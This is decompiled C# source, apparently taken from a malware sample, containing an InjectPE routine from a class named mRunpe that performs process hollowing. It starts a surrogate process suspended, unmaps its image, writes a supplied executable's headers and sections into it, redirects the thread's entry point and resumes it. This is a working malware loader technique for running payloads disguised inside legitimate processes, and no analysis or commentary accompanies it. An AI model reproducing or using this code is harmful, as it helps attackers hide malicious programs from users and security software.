// Token: 0x0600009E RID: 158 RVA: 0x000097EC File Offset: 0x000079EC public static bool InjectPE(byte[] bytes, string surrogateProcess, string optionalArguments = "") { try { IntPtr zero = IntPtr.Zero; IntPtr[] array = new IntPtr[4]; mRunpe.STARTUPINFO startupinfo = default(mRunpe.STARTUPINFO); int num = BitConverter.ToInt32(bytes, 60); int num2 = (int)BitConverter.ToInt16(bytes, num + 6); IntPtr value = new IntPtr(BitConverter.ToInt32(bytes, num + 84)); startupinfo.cb = Strings.Len(startupinfo); startupinfo.wShowWindow = 0; startupinfo.dwFlags = 257; Process process = new Process(); process.StartInfo.CreateNoWindow = false; if (!string.IsNullOrEmpty(optionalArguments)) { surrogateProcess = surrogateProcess + " " + optionalArguments; } if (!mRunpe.CreateProcess(null, new StringBuilder(surrogateProcess), zero, zero, false, 4, zero, null, ref startupinfo, array)) { return(false); } uint[] array2 = new uint[179]; array2[0] = 65538u; if (mRunpe.GetThreadContext(array[1], array2)) { IntPtr baseAddr = new IntPtr((long)((ulong)array2[41] + 8UL)); IntPtr zero2 = IntPtr.Zero; IntPtr value2 = new IntPtr(4); IntPtr zero3 = IntPtr.Zero; if (mRunpe.ReadProcessMemory(array[0], baseAddr, ref zero2, (int)value2, ref zero3) && (ulong)mRunpe.NtUnmapViewOfSection(array[0], zero2) == 0UL) { IntPtr intPtr = new IntPtr(BitConverter.ToInt32(bytes, num + 52)); IntPtr intPtr2 = new IntPtr(BitConverter.ToInt32(bytes, num + 80)); IntPtr lpBaseAddress = mRunpe.VirtualAllocEx(array[0], intPtr, intPtr2, 12288, 64); int lpNumberOfBytesWritten; mRunpe.WriteProcessMemory(array[0], lpBaseAddress, bytes, (uint)((int)value), lpNumberOfBytesWritten); int num3 = num2 - 1; int num4 = 0; int num5 = num3; for (int i = num4; i <= num5; i++) { int[] array3 = new int[10]; Buffer.BlockCopy(bytes, num + 248 + i * 40, array3, 0, 40); byte[] array4 = new byte[array3[4] - 1 + 1]; Buffer.BlockCopy(bytes, array3[5], array4, 0, array4.Length); intPtr2 = new IntPtr(lpBaseAddress.ToInt32() + array3[3]); intPtr = new IntPtr(array4.Length); mRunpe.WriteProcessMemory(array[0], intPtr2, array4, (uint)((int)intPtr), lpNumberOfBytesWritten); } intPtr2 = new IntPtr((long)((ulong)array2[41] + 8UL)); intPtr = new IntPtr(4); mRunpe.WriteProcessMemory(array[0], intPtr2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)((int)intPtr), lpNumberOfBytesWritten); array2[44] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num + 40)); mRunpe.SetThreadContext(array[1], array2); } } Thread.Sleep(1000); mRunpe.ResumeThread(array[1]); } catch (Exception ex) { return(false); } return(true); }
private static extern bool CreateProcess(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, [In] ref mRunpe.STARTUPINFO lpStartupInfo, IntPtr[] pInfo);